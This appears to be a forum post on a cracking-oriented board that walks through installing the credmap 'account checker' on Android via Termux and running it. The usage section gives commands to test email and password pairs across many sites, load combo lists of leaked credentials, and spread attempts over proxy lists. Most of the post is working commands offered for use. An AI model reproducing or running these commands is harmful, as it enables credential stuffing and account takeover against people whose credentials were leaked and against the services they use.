19 August, 2022 - 02:29 PM
(29 September, 2019 - 06:24 PM)Pruned4773 Wrote: Show MoreFeatures
- Cross platform ( Supports Windows, Mac, Linux, Android and much more :)- Supports a lot of sites and will continue to support more.- Easy to make config files. Documentation is provided on the site given.
Supported Sites : Click Here (https://pastr.io/view/A2jR3Y)
How To Use Multiple Account Checker | 28 Sites | Cross platform | On Android Device
Do note that this tool is a CLI ( command line interface) toolThis might be intimidating for some users but is not really that hard.I will walk you through the steps to download and install this tool and show you briefly how to use it.Downloading and installing on your android phone.1. Download and install the TERMUX app on your android device.2. open the app and typepkg install git python2This installs git and python2 to download and use the software.Now, type.git clone https://github.com/lightos/credmap.gitThis command downloads the program from the server.After that is complete, type.cd credmapthis changes into the folder where the program is located.Usepython2 credmap -hTo run the program and display the help command.If everything goes as expected, you will now see something similar.
UsageTo test a particular email and password on all sites, use the commandpython2 credmap.py -e [email protected] -p password1234To test all sites except one, use the commandpython2 credmap.py -e [email protected] -p password1234 --exclude "instagram.com"To test all sites except some, use the commandpython2 credmap.py -e [email protected] -p password1234 --exclude "instagram.com, spotify.com"To test only some sites, use the command ▪python2 credmap.py -e [email protected] -p password1234 --only "instagram.com"To load a combo list, use the command ▪python2 credmap.py --load "path/to/combolist.txt" --format "e:p"Here "e:p" means the format is in email:password. Use "u:p" for username:password combos.To use a proxies with combolists, use the commandpython2 credmap.py --load "path/to/combolist.txt" --format "e:p" --proxy " 143.23.12.24:8080, 154.143.34.143:8080...(paste proxy list here)"
That's IT
DOWNLOAD
let's see if works